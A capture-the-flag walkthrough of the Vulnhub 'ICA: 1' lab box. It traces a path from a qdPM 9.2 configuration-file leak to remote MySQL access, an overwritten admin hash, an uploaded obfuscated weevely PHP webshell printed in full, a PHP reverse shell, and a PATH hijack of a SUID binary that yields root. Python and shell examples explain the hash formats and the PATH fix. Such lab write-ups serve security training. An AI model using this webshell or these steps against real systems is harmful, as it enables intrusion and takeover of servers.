
Vulnhub Walkthrough Notes (ICA: 1)

Author: AILX10
  • Product Name:ICA: 1
  • Chinese name: ICA: 1
  • Published date: September 25, 2021
  • Difficulty: Easy
  • Description: Based on information from our intelligence network, the ICA is working on a secret project. We need to figure out what this project is. Once you have access information, please send it to us. We'll put a backdoor to access the system later. You just have to focus on what the project is. You may have to go through several layers of security. The agency is confident that you will succeed in this task. Good luck, agent!
  • Download: https://www.vulnhub.com/entry/ica-1,748/

1. Deployment information (target IP address: 192.168.199.168)

[Screenshot: boot screen]

2. Port scan: ports 22, 80 and 3306 are open. nmap's mysql-info script also reports the server's authentication challenge (labelled "Salt"), which is the random 20-byte scramble MySQL sends at connection time, not a stored password salt:

Salt: O*IDsu\x1B	Zp4BOQ#,Uo,S           
[Screenshot: port scan]

3. The home page is a login form that asks for an email address and password.

[Screenshot: home page]

4. Brute-force directories on the site; the leftover installation directory reveals the application and its version, qdPM 9.2.

[Screenshot: the directory where the website is installed]

5. Search for known vulnerabilities in qdPM 9.2 (searchsploit result):

qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt           
[Screenshot: qdPM 9.2 vulnerability search result]

6. Read the exploit (EDB-ID 50176). It is an unauthenticated information disclosure:

The password and connection string for the database are stored in a yml file. 
To access the yml file you can go to http://<website>/core/config/databases.yml file and download. 
  
[Screenshot: exploit details]

7. Download the YAML file and extract the database username and password from it:

qdpmadmin
UcVQCMQk2STVeS6J           
[Screenshot: username and password]

8. Port 3306 is reachable from outside, so log in to the MySQL server remotely with those credentials:

mysql -h 192.168.199.168 -u qdpmadmin -p
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| qdpm               |
| staff              |
| sys                |
+--------------------+           
[Screenshot: database login]

9. Switch to the qdpm database and list its tables:

MySQL [(none)]> use qdpm
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [qdpm]> show tables;
+----------------------+
| Tables_in_qdpm       |
+----------------------+
| attachments          |
| configuration        |
| departments          |
| discussions          |
| discussions_comments |
| discussions_reports  |
| discussions_status   |
| events               |
| extra_fields         |
| extra_fields_list    |
| phases               |
| phases_status        |
| projects             |
| projects_comments    |
| projects_phases      |
| projects_reports     |
| projects_status      |
| projects_types       |
| tasks                |
| tasks_comments       |
| tasks_groups         |
| tasks_labels         |
| tasks_priority       |
| tasks_status         |
| tasks_types          |
| tickets              |
| tickets_comments     |
| tickets_reports      |
| tickets_status       |
| tickets_types        |
| user_reports         |
| users                |
| users_groups         |
| versions             |
| versions_status      |
+----------------------+
35 rows in set (0.021 sec)           

10. The configuration table holds the web administrator's email address and password hash, but the hash alone does not let you log in:

|  1 | app_administrator_email    | [email protected]                   |
|  2 | app_administrator_password | $P$EmesnWRcY9GrK0hDzwaV3rvQnMJ/Fx0 |
[Screenshot: configuration table contents]

11. Rather than crack the administrator's hash, overwrite it.

$P$EmesnWRcY9GrK0hDzwaV3rvQnMJ/Fx0 is 34 characters long and starts with $P$: that is the phpass portable hash format (a salted, iterated MD5), not a plain MD5 and not a crypt(3) DES hash, so it only falls offline to a wordlist hit. The database user can write to the configuration table, so replace the value with a hash of a plaintext we choose. The write-up uses an MD5-crypt ($1$) hash of "ailx10"; that works because a phpass-style CheckPassword() falls back to crypt(3) for any hash that is not in its own format, and the successful login in the next step confirms the application accepts it:

MySQL [qdpm]> update configuration set value="$1$m0IX0vwl$HR6rGO5FjvC39TsfOXWLK0" where id=2;
Query OK, 1 row affected (0.007 sec)
Rows matched: 1  Changed: 1  Warnings: 0           
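The two hash formats involved in this step, and the fallback that makes the swap work, as an added example (this is not qdPM's code and not from the original write-up; it assumes the application verifies passwords with a phpass-style CheckPassword(), which the $P$ prefix and the accepted $1$ hash both point to). It ports phpass's portable hash and the classic md5-crypt scheme to Python, then implements the verifier's "try portable format, else fall back to crypt(3)" logic. Only the $1$ branch of crypt(3) is implemented; other crypt schemes are rejected:

```python
"""phpass portable hashes ($P$), md5-crypt ($1$) and the CheckPassword() fallback.

Added example, not part of qdPM or of the original write-up. Assumptions:
the target verifies with phpass's CheckPassword(); only the $1$ crypt(3)
scheme is implemented for the fallback branch.
"""
import hashlib
import secrets

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _phpass_encode64(data: bytes, count: int) -> str:
    """phpass encode64(): little-endian 6-bit packing, no padding (16 bytes -> 22 chars)."""
    out = bytearray()
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return out.decode()


def phpass_crypt_private(password: bytes, setting: str) -> str:
    """Port of phpass crypt_private(). Returns '*0' or '*1' for settings it does not handle."""
    output = "*0"
    if setting[:2] == output:
        output = "*1"
    if setting[:3] not in ("$P$", "$H$"):
        return output
    count_log2 = ITOA64.find(setting[3:4].encode())  # -1 if the cost char is invalid
    if count_log2 < 7 or count_log2 > 30:
        return output
    salt = setting[4:12]
    if len(salt) != 8:
        return output
    h = hashlib.md5(salt.encode() + password).digest()
    for _ in range(1 << count_log2):  # iterated MD5, cost is 2**count_log2
        h = hashlib.md5(h + password).digest()
    return setting[:12] + _phpass_encode64(h, 16)


def phpass_hash(password: bytes, count_log2: int = 8, salt: str = "") -> str:
    """Build a fresh $P$ hash the way phpass HashPassword() does with portable hashes on."""
    if not salt:
        salt = _phpass_encode64(secrets.token_bytes(6), 6)  # 6 random bytes -> 8 salt chars
    setting = "$P$" + chr(ITOA64[count_log2]) + salt[:8]
    return phpass_crypt_private(password, setting)


def md5_crypt(password: bytes, salt: bytes) -> str:
    """Classic md5-crypt, the scheme crypt(3) selects for a '$1$' salt."""
    magic = b"$1$"
    salt = salt[:8]
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    remaining = len(password)
    while remaining > 0:  # one byte of the alternate sum per password byte
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bit = len(password)
    while bit:  # for each bit of the length: NUL for a 1 bit, password[0] for a 0 bit
        ctx.update(b"\x00" if bit & 1 else password[:1])
        bit >>= 1
    final = ctx.digest()
    for i in range(1000):  # fixed stretching loop
        ctx = hashlib.md5(password if i & 1 else final)
        if i % 3:
            ctx.update(salt)
        if i % 7:
            ctx.update(password)
        ctx.update(final if i & 1 else password)
        final = ctx.digest()

    def to64(v: int, n: int) -> bytes:
        out = bytearray()
        for _ in range(n):
            out.append(ITOA64[v & 0x3F])
            v >>= 6
        return bytes(out)

    order = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    encoded = b"".join(to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in order)
    encoded += to64(final[11], 2)
    return (magic + salt + b"$" + encoded).decode()


def check_password(password: str, stored_hash: str) -> bool:
    """phpass CheckPassword(): portable scheme first, then crypt(3) for anything else."""
    pw = password.encode()
    h = phpass_crypt_private(pw, stored_hash)
    if h[0] == "*":  # not a $P$/$H$ hash: phpass hands it to crypt()
        if not stored_hash.startswith("$1$"):
            return False  # other crypt(3) schemes are out of scope for this example
        salt = stored_hash[3:].split("$", 1)[0].encode()
        h = md5_crypt(pw, salt)
    return secrets.compare_digest(h, stored_hash)


if __name__ == "__main__":
    admin_hash = "$P$EmesnWRcY9GrK0hDzwaV3rvQnMJ/Fx0"  # from the configuration table; plaintext unknown
    print("portable phpass hash, cost 2^%d" % ITOA64.find(admin_hash[3:4].encode()))
    replacement = "$1$m0IX0vwl$HR6rGO5FjvC39TsfOXWLK0"  # the $1$ hash written in the UPDATE above
    print("replacement accepted for 'ailx10':", check_password("ailx10", replacement))
    print("a $P$ hash would have worked too:", check_password("ailx10", phpass_hash(b"ailx10")))
```

Either format is accepted by the UPDATE in the write-up; the $P$ variant has the advantage of looking like every other hash in the table. The MD5-crypt implementation can be checked against the vector in the PHP crypt() manual, `$1$rasmusle$rISCgZzpwk3UhDidwXvin0` for "rasmuslerdorf".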
[Screenshot: updated password hash]

12. Log in to the administrator web interface with the new password:

Username: [email protected]
Password: ailx10
[Screenshot: administrator console]

13. Try the file upload features. Creating a new user allows an avatar to be uploaded,

[Screenshot: adding a new user]

but the avatar upload only accepts image files.

[Screenshot: uploaded image]

14. Log in as the newly created user ailx10: attachments can be uploaded without a file-type check. Generate a PHP webshell with weevely and upload it as an attachment:

┌──(ailx10㉿kali)-[~]
└─$ weevely generate ailx10 ./ailx10.php            
Generated './ailx10.php' with password 'ailx10' of 771 byte size.
                                                                                                                                       
┌──(ailx10㉿kali)-[~]
└─$ cat ailx10.php 
<?php
$k='$k="83b70Yz5Yz04";$kYzh="e0d874Yz2ddYz5Yzb6";$kf="Yz6e6962eb8aYz35";$p=Yz"VkTYzVUW2Z';
$I='Yz(@baYzse64_decoYzde($mYz[1]),$k))Yz);$Yzo=@oYzb_get_Yzcontents()Yz;@ob_endYz_cleaYzn';
$G='zYzntYzents("php:Yz//input"),$Yzm)==1) {@obYz_Yzstart();@eYzval(@YzgzuncoYzmpress(@x';
$O='z"Yz;Yzfor(Yz$i=0;$i<$l;){for($j=0;($j<Yz$c&&Yz$i<$l);$jYz++,$i+Yz+Yz){$o.=$t{$i}Yz^$k{';
$s=str_replace('ij','','cijreatije_ijfuijncijijtion');
$P='$j}Yz;}}rYzeYzturn $o;Yz}if Yz(@prYzeg_matcYzh("Yz/$kh(.+)$YzkYzf/"Yz,@file_get_coY';
$i='MYzT1JVyFr";fYzuYzYznction x($t,$k)Yz{$c=sYztYzrlen($k);$l=sYztrlYzen($t);Yz$o="YzY';
$N='();$Yzr=@base6Yz4_eYzncodYze(@x(Yz@gzcoYzmpress($o),$YzkYz));print("$pYz$kh$rYz$kf");}';
$J=str_replace('Yz','',$k.$i.$O.$P.$G.$I.$N);
$m=$s('',$J);$m();
?>           
[Screenshot: attachment upload]

15. Connect to the uploaded webshell with weevely (the agent password is ailx10):

weevely http://192.168.199.168/uploads/attachments/575837-ailx10.php ailx10           
[Screenshot: webshell session]

16. Enumerate SUID binaries; /opt/get_access stands out:

find / -type f -perm -u=s 2>/dev/null
[Screenshot: SUID search]

17. Run and analyze the binary. It is SUID root, imports setuid/setgid and system, and strings shows the command it runs is `cat /root/system.info`: the command name is relative, so `cat` is looked up through PATH while the process holds root privileges.

www-data@debian:/home $ ls -hl /opt/get_access
-rwsr-xr-x 1 root root 17K Sep 25  2021 /opt/get_access
www-data@debian:/home $ /opt/get_access

  ############################
  ########     ICA     #######
  ### ACCESS TO THE SYSTEM ###
  ############################

  Server Information:
   - Firewall:	AIwall v9.5.2
   - OS:	Debian 11 "bullseye"
   - Network:	Local Secure Network 2 (LSN2) v 2.4.1

All services are disabled. Accessing to the system is allowed only within working hours.
www-data@debian:/home $ strings /opt/get_access
/lib64/ld-linux-x86-64.so.2
setuid
socket
puts
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
cat /root/system.info
Could not create socket to access to the system.
All services are disabled. Accessing to the system is allowed only within working hours.
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110           

18. Plant a fake cat that launches a shell and try to put /tmp first in PATH. The webshell runs each command in a separate process, so the exported PATH does not carry over to the next command and the attempt fails.

Replace the cat command with a shell:

echo '/bin/bash' > /tmp/cat
chmod +x /tmp/cat           
[Screenshot: attempt to set environment variables]

19. The webshell is too limited for this, so swap it for a reverse shell (Kali ships php-reverse-shell.php; upload it the same way as the weevely agent). From the interactive reverse shell, PATH can be set and stays set:

┌──(root㉿kali)-[/home/ailx10]
└─# find / -name "php-reverse-shell.php" 2>/dev/null                   
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php           
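Steps 17 to 19 as a local, unprivileged re-creation (added example, not from the original write-up). The SUID binary is stood in for by `sh -c 'cat FILE'`, on the assumption that /opt/get_access reaches `system("cat /root/system.info")` the same way, with `cat` resolved through PATH; the fake cat only reports that it ran instead of spawning /bin/bash. The hardened variant shows the fix a setuid program should apply: reset PATH before calling system(). The last function reproduces why the first attempt from the webshell failed, by sending the PATH change and the check as two separate processes:

```sh
#!/bin/sh
# Added example, not from the original write-up. Runs unprivileged; the
# vulnerable SUID binary is simulated, the file paths are constructed here.

# Drop a fake `cat` into DIR. On the target this is the write-up's
# `echo '/bin/bash' > /tmp/cat`; here it just reports that it was chosen.
plant_fake_cat() {
    mkdir -p "$1"
    printf '#!/bin/sh\necho "HIJACKED: fake cat ran as uid $(id -u) with args: $*"\n' > "$1/cat"
    chmod +x "$1/cat"
}

# Stand-in for get_access: the command name is relative, so the shell that
# system() starts walks PATH to find `cat`.
vulnerable_target() {
    sh -c "cat '$1'"
}

# What a setuid program should do instead: fix PATH before system().
hardened_target() {
    sh -c "PATH=/usr/bin:/bin; export PATH; cat '$1'"
}

# Run the given target function with the fake cat first in PATH and print
# what it produced. The PATH change is scoped to the subshell.
attack() {
    target_func="$1"
    work="$(mktemp -d)"
    secret="$work/system.info"
    echo "top secret project" > "$secret"        # constructed stand-in for /root/system.info
    plant_fake_cat "$work/bin"
    result="$(PATH="$work/bin:$PATH"; export PATH; "$target_func" "$secret")"
    rm -rf "$work"
    printf '%s\n' "$result"
}

# Why step 18 failed: each webshell command is a fresh process, so an
# exported PATH from one command is gone by the next. Prints "unchanged".
env_does_not_persist() {
    before="$(sh -c 'printf %s "$PATH"')"
    sh -c 'PATH=/tmp/fakebin:$PATH; export PATH'   # first command sent through the webshell
    after="$(sh -c 'printf %s "$PATH"')"           # second command: a new process
    [ "$before" = "$after" ] && echo unchanged || echo changed
}

attack vulnerable_target
attack hardened_target
env_does_not_persist
```

Against the real binary the same idea applies unchanged: with /tmp first in PATH and /tmp/cat executable, `/opt/get_access` runs the fake cat under the setuid(0)/setgid(0) it performed, which is where the root shell in the next step comes from.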
[Screenshot: reverse shell with PATH set]

20. With /tmp first in PATH, running /opt/get_access executes the fake cat as root, giving a root shell.

[Screenshot: root shell]

21. Collect the two flags, one for the ordinary user and one for root.

[Screenshot: the two flags]

That completes the box.